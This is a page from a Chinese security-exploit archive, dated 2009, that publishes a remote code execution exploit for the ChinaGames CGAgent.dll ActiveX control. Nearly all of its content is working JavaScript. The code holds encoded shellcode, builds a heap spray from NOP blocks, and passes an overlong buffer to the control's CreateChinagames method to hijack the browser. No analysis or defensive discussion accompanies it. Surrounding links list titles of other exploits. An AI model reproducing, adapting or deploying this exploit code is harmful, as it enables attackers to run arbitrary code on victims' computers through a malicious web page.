首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ChinaGames (CGAgent.dll) ActiveX Remote Code Execution Exploit
来源:www.vfcocus.net 作者:vfocus 发布时间:2009-05-26  

 

function test(){    var shellcode =
unescape("\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6574\u7473\uc48b\u6853\u3a20\u292d\u7468\u2065\u6820\u6168\u6972\ud48b\u5053\u5352\u57ff\u53fc\u57ff\u00f8");
var bigblock = unescape("%u9090%u9090");    var headersize = 20;    var slackspace =
headersize+shellcode.length;    while (bigblock.length<slackspace)        bigblock+=bigblock;   
fillblock = bigblock.substring(0, slackspace);    block = bigblock.substring(0,
bigblock.length-slackspace);    while(block.length+slackspace<0x40000)        block =
block+block+fillblock;     memory = new Array();    for (x=0; x<300; x++)        memory[x] = block
+ shellcode;    var buffer = '';    while (buffer.length < 796 )      
buffer+=unescape("%u0c0c");    target.CreateChinagames(buffer);} test();


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mole Group Sky Hunter/Bus Tick
·Soulseek 157 NS */ 156.* Remot
·Winamp <= 5.55 (MAKI script) U
·MiniTwitter 0.3-Beta (SQL/XSS)
·ZaoCMS (user_updated.php) Remo
·Joomla Boy Scout Advancement 0
·Winamp <= 5.55 (MAKI script) U
·COWON America jetCast 2.0.4.11
·Winamp 5.551 MAKI Parsing Inte
·Dokuwiki 2009-02-14 Local File
·Microsoft IIS 6.0 WebDAV Remot
·ArcaVir 2009 < 9.4.320X.9 (ps_
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved